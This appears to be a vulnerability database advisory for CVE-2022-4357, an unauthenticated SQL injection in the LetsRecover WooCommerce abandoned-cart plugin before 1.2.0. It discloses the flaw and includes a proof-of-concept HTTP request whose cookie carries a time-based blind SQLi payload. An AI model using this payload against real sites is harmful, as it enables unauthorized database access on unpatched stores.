WordPress Plugin Vulnerabilities

LetsRecover < 1.2.0 - Unauthenticated SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

GET /checkout/order-received/30/?key=wc_order_Kwss5kjkrhgKG HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/checkout/
Cookie: wplrp_subscriber_id=5 AND (SELECT 7741 FROM (SELECT(SLEEP(5)))hlAf);
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

Affects Plugins

Plugin icon
letsrecover-woocommerce-abandoned-cart
Fixed in 1.2.0

References

CVE
CVE-2022-4357
URL
https://bulletin.iese.de/post/letsrecover-woocommerce-abandoned-cart_1-1-0_1

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Daniel Krohmer, Kunal Sharma
Submitter
Daniel Krohmer
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
4d1c0886-11f7-494f-b175-691253f46626

Timeline

Publicly Published
2022-12-12 (about 1 years ago)
Added
2022-12-12 (about 1 years ago)
Last Updated
2023-03-16 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
LeagueManager 3.8 - SQL Injection
Published
2022-02-14
Title
WP Visitor Statistics (Real Time Traffic) < 5.6 - Subscriber+ SQL Injection
Published
2022-12-05
Title
Contest Gallery < 19.1.5 - Unauthenticated SQL Injection
Published
2020-07-09
Title
Travel Booking < 2.8.4 - Unauthenticated SQL Injection
Published
2022-11-08
Title
Form Vibes < 1.4.6 - Admin+ SQLi